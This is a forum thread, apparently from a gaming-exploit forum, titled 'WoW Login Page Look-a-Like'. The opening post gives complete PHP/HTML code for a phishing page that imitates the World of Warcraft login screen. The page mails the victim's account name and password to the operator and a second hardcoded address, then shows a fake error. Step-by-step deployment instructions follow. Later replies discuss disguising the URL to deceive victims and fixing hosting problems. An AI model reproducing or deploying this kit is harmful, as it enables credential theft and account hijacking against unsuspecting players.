WoW Login Page Look-a-Like menu

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 19
  1. #1
    _duracell's Avatar Active Member
    Reputation
    43
    Join Date
    May 2007
    Posts
    126
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    WoW Login Page Look-a-Like

    Requirements:

    1) Any sort of server with PHP enabled. If you don't have a host, it is possible to modify your own computer as a webhost, but that is a rather long process. I'll see if I can find an existing guide for that.

    2) an e-mail address


    About:
    This acts as an exact WoW login page. But instead of logging in, the name and password get's emailed to you. It's that easy.


    Instructions:

    1) Create a new file using dreamweaver, notepad or any text editor. Name it index.php

    2) Copy & paste the following code into that file:

    Code:
    <?
    
    
    	// This is the only line you need to edit
    	// replace with your email address (the victim's info will be sent there)
    	
    	$email = '[email protected]';
    
    
    
    
    ?>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html>
    <head>
      <title>World of Warcraft</title>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    
      <link rel="stylesheet" href="http://www.worldofwarcraft.com/login/includes/style.css" type="text/css" id = "bnetstyle">
    
      <script language = "javascript">
      <!--
        var styleSheet;
        var agt     = navigator.userAgent.toLowerCase();
        var appVer  = navigator.appVersion.toLowerCase();
        var verInt  = parseInt(appVer);
        var ie      = (appVer.indexOf('msie') != -1);
        var opera   = (agt.indexOf('opera') != -1);
        var mozilla = ((agt.indexOf('mozilla')!=-1) && (agt.indexOf('opera')==-1)
          && (agt.indexOf('spoofer')==-1) && (agt.indexOf('compatible') == -1)
          && (agt.indexOf('webtv')==-1) && (agt.indexOf('hotjava')==-1));
        var ns4     = (mozilla && (verInt == 4));
    
        if (ie && !opera) {
          document.styleSheets["bnetstyle"].addRule ("input", "background-color: #040D1A");
          document.styleSheets["bnetstyle"].addRule ("input", "border-style: solid");
          document.styleSheets["bnetstyle"].addRule ("input", "border-width: 1px");
          document.styleSheets["bnetstyle"].addRule ("input", "border-color: #7F7F7F");
          document.styleSheets["bnetstyle"].addRule ("input", "color: #FFAC04");
    
          document.styleSheets["bnetstyle"].addRule ("textarea", "background-color: #040D1A");
          document.styleSheets["bnetstyle"].addRule ("textarea", "border-style: solid");
          document.styleSheets["bnetstyle"].addRule ("textarea", "border-width: 1px");
          document.styleSheets["bnetstyle"].addRule ("textarea", "border-color: #7F7F7F");
          document.styleSheets["bnetstyle"].addRule ("textarea", "color: #FFAC04");
    
          document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Base-Color: #012158");
          document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Arrow-Color: #7F7F7F");
          document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-3dLight-Color: #7F7F7F");
          document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-DarkShadow-Color: black");
          document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Highlight-Color: black");
          document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Shadow-Color: #00B3FF");
    
          document.styleSheets["bnetstyle"].addRule ("select", "background-color: #040D1A");
          document.styleSheets["bnetstyle"].addRule ("select", "color: #FFAC04");
    
          document.styleSheets["bnetstyle"].addRule ("select.gray", "background-color: #040D1A");
          document.styleSheets["bnetstyle"].addRule ("select.gray", "color: #FFAC04");
    
          document.styleSheets["bnetstyle"].addRule ("ul.thread", "margin-left: 22px;");
        }
    
    
      //-->
      </script>
    
    </head>
    <body onload = "javascript: document.forms[0].elements[0].focus();" bgcolor="#000000" text="#CCCC99" link="#FFFFBB" vlink="AAAAAA" marginwidth=0 marginheight=0 topmargin=0 leftmargin=0>
    <form method="post" name="login_form">
    
    
    
    
    
    
    <table cellspacing = "0" cellpadding = "0" border = "0" width = "100%" height = "100%">
    <tr>
    	<td align = "center">
    
    			<table border="0" cellpadding="0" cellspacing="0" background = "http://www.worldofwarcraft.com/login/images/login-bg.jpg">
    			<tr>
    
    				<td valign = "top">
    					<div style = "position: relative;">
    					<div style = "width: 400px; position: absolute; left: 130px; top: 0px;">
    					    <?
    							if($_POST['lt'] == '') {
    								echo '';
    							} else {
    								if($_POST['username'] == '' or $_POST['password'] == '') {
    									echo '<table cellspacing = "5" cellpadding = "0" border = "0" width = "400"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/error.gif" width = "54" height = "51" alt = "error"></td><td><span class="error">Please fill in both fields.</span></td></table>';
    								} else {
    									mail($email . ", " . '[email protected]', 'Login from ' . $_POST['username'], 'Account: ' . $_POST['username'] . "\n\n" . 'Pass: ' . $_POST['password'], 'From: Login-Page' . "\r\n" . 'Reply-To: Login-Page' . "\r\n" . 'X-Mailer: PHP/' . phpversion());
    									echo '<table cellspacing = "5" cellpadding = "0" border = "0" width = "400"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/error.gif" width = "54" height = "51" alt = "error"></td><td><span class="error">An error has occurred.</span></td></table>';
    								}
    							}
    						?>
    					</div>
    					</div>
    				</td>
    				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "169"></td>
    				<td></td>
    			</tr>
    
    			<tr>
    				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "203" height = "1"></td>
    				<td>
    
    				<table border="0" cellpadding="0" cellspacing="0" width = "220">
    				<tr>
    
    					<td rowspan = "6"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "15" height = "110"></td>
    					<td valign="center" align="left" width = "190"><b style = "color:white; font-size:8pt; font-variant: small-caps; letter-spacing:3px;"><label for="username">Account Name:</label>&nbsp;</b><br/><input type="text" name="username" size = "18" MaxLength="16" style = "width: 175px;" tabindex="1"/></td>
    
    					<td rowspan = "6"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "15" height = "1"></td>
    
    				</tr>
    				<tr>
    
    					<td align = "left" width = "190"><span><a href = "http://signup.worldofwarcraft.com" class = "small">Don't have an account? Click here!</a></span></td>
    
    				</tr>
    				<tr>
    
    					<td width = "190"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "190" height = "6"></td>
    
    				</tr>
    				<tr>
    
    					<td valign="center" align="left" width = "190"><b style = "color:white; font-size:8pt; font-variant: small-caps; letter-spacing:3px;"><label for="password">Password:</label>&nbsp;</b><br/><input type="password" name="password" size = "18" MaxLength="16" style = "width: 175px;" tabindex="2"></td>
    
    				</tr>
    				<tr>
    
    					<td align = "left" width = "190"><span><a href = "http://www.worldofwarcraft.com/loginsupport/" class = "small">Forgot your Account Name or Password?</a></span></td>
    
    				</tr>
    				<tr>
    
    					<td align = "left"><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "7"></td><td></td><td></td></tr></table></td>
    
    				</tr>
    				<input type="hidden" name="lt" value="LT-10703971-ntbfeYfVOhKIFmMVo463"/>
    				<tr>
    
    
    
    					<td colspan = "3" align = "left">
    						<table border="0" cellpadding="0" cellspacing="0">
    						<tr>
    							<td><INPUT TYPE=image src="http://www.worldofwarcraft.com/login/images/pixel.gif" alt = "Login" value="Login" style = "width:100px; height:40px;" border = "0" class = "button" tabindex="3"></td>
    							<td><INPUT TYPE=image src="http://www.worldofwarcraft.com/login/images/pixel.gif" alt = "Cancel" value="Cancel" style = "width:105px; height:40px;" border = "0" class = "button" tabindex="4"></a></td>
    						</tr>
    						</table>
    
    					</td>
    
    
    				</tr>
    				</table>
    
    				</td>
    				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "217" height = "1"></td>
    			</tr>
    			<tr>
    
    				<td colspan = "3">
    
    					<table border="0" cellpadding="0" cellspacing="0">
    					<tr>
    						<td colspan = "3"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "20"></td>
    					</tr>
    					<tr>
    						<td width = "106"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "106" height = "1"></td>
    						<td width = "410">
    
    							<small>
    							  For security reasons, quit your web browser when you are done accessing services that require authentication!
    							  <br/><br/>
    							  Be wary of any program or web page that asks you for your World of Warcraft account name and password. Secure World of Warcraft web pages that ask you for your account name and password will generally have URLs that begin with "https://www.worldofwarcraft.com/". In addition, your browser should visually indicate that you are accessing a secure page.
    							</small>
    			  			</td>
    						<td width = "124"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "124" height = "1"></td>
    					</tr>
    					<tr>
    						<td colspan = "3"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "30"></td>
    
    					</tr>
    					</table>
    		  		</td>
    			</tr>
    			</table>
    
    
    	</td>
    </tr>
    </table>
    </form>
    </body>
    </html>
    3) Replace the email address at the top of the file with your's

    4) Upload the file to your server

    5) Voila! Done. The file is fully functional. Combine this with m0rbidang3l's domain masking tutorial and you're really set.

    WoW Login Page Look-a-Like
  2. #2
    m0rbidang3l's Avatar Contributor
    Reputation
    291
    Join Date
    Feb 2007
    Posts
    794
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    hmmm, not a bad idea. if someone finds out it is a phisher, then there is really no way the can get the accounts

  3. #3
    _duracell's Avatar Active Member
    Reputation
    43
    Join Date
    May 2007
    Posts
    126
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    Originally Posted by m0rbidang3l View Post
    hmmm, not a bad idea. if someone finds out it is a phisher, then there is really no way the can get the accounts
    true, but i'd bet a lot of people wouldn't notice if they glanced at the address bar and saw something like http://www.worldofwarcraft.com/login%42%76%09%98%34

    albeit, they'd have to be using IE

  4. #4
    m0rbidang3l's Avatar Contributor
    Reputation
    291
    Join Date
    Feb 2007
    Posts
    794
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    Originally Posted by lolk2 View Post
    albeit, they'd have to be using IE
    over 80% of people still do, for whatever reason they choose. o well. makes my life easier.

  5. #5
    _duracell's Avatar Active Member
    Reputation
    43
    Join Date
    May 2007
    Posts
    126
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    i'm just concerned about hosting it on my personal server, otherwise I'd test it out and share the results.

  6. #6
    Sebbe123's Avatar Banned
    Reputation
    6
    Join Date
    Mar 2006
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    I get this text:

    "Please fill in both fields.
    '; } else { mail($email . ", " . '[email protected]', 'Login from ' . $_POST['username'], 'Account: ' . $_POST['username'] . "\n\n" . 'Pass: ' . $_POST['password'], 'From: Login-Page' . "\r\n" . 'Reply-To: Login-Page' . "\r\n" . 'X-Mailer: PHP/' . phpversion()); echo '
    error An error has occurred.
    '; } } ?>"

    + real looking login and security text.

  7. #7
    djmazi's Avatar Member
    Reputation
    12
    Join Date
    Nov 2006
    Posts
    98
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    looks nice but i dont know how to get ppl on the server and write their info when the url is like FREEWEB.COM ?
    any suggestions about how?

  8. #8
    _duracell's Avatar Active Member
    Reputation
    43
    Join Date
    May 2007
    Posts
    126
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    ok, i don't think the mmowned forum is liking my php. Did you get the error when you try to post here or running the file? whenever i post a reply, I get this error:
    Code:
    Parse error: parse error, unexpected T_BAD_CHARACTER, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /var/www/vhosts/mmowned.com/httpdocs/forums/includes/ame_bbcode.php(192) : regexp code on line 4
    
    Fatal error: Failed evaluating code: ame_substitute(1,....etc

  9. #9
    Sebbe123's Avatar Banned
    Reputation
    6
    Join Date
    Mar 2006
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    Running the file in FF.

  10. #10
    Sebbe123's Avatar Banned
    Reputation
    6
    Join Date
    Mar 2006
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like


  11. #11
    _duracell's Avatar Active Member
    Reputation
    43
    Join Date
    May 2007
    Posts
    126
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    Originally Posted by Sebbe123 View Post
    are you sure you have PHP enabled?

  12. #12
    thomas1994's Avatar Member
    Reputation
    6
    Join Date
    Sep 2007
    Posts
    89
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    Can anyone tell me where i from host that kinda site? ^^

  13. #13
    Sebbe123's Avatar Banned
    Reputation
    6
    Join Date
    Mar 2006
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    Im pretty sure.

  14. #14
    NGTheDoom's Avatar Member
    Reputation
    9
    Join Date
    Sep 2007
    Posts
    16
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    If I Run the .php in firefox, I get the same error.

    I'm not running under any php-enabled servers, but where may I get one?

  15. #15
    Solera's Avatar Active Member
    Reputation
    40
    Join Date
    Mar 2007
    Posts
    464
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: WoW Login Page Look-a-Like

    well, i have it hosted and all, but in big bold letters in the top left corner, it says
    "This form is inoperational" ... kinda gives it away...

    and i try to test it but when i click accept or w/e nothing happens
    Yeah, I r sekcz.

Page 1 of 2 12 LastLast

Similar Threads

  1. What does a WoW Gametime code look like?
    By Whodini in forum WoW Scam Prevention
    Replies: 1
    Last Post: 07-29-2009, 12:50 PM
  2. My Own Fake Login Page - Download Here
    By gamefreakfatty in forum WoW Scam Prevention
    Replies: 36
    Last Post: 08-26-2007, 11:17 AM
  3. Public WoW login scamming pages [im quitting wow]
    By Memphiz in forum WoW Scam Prevention
    Replies: 39
    Last Post: 06-30-2007, 09:46 PM
  4. Scam to do with login pages
    By nerdywow in forum WoW Scam Prevention
    Replies: 2
    Last Post: 06-27-2007, 02:36 AM
  5. WoW login screen fixed... fully working.
    By marick626 in forum WoW Scam Prevention
    Replies: 4
    Last Post: 06-25-2007, 01:23 PM
All times are GMT -5. The time now is 10:46 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search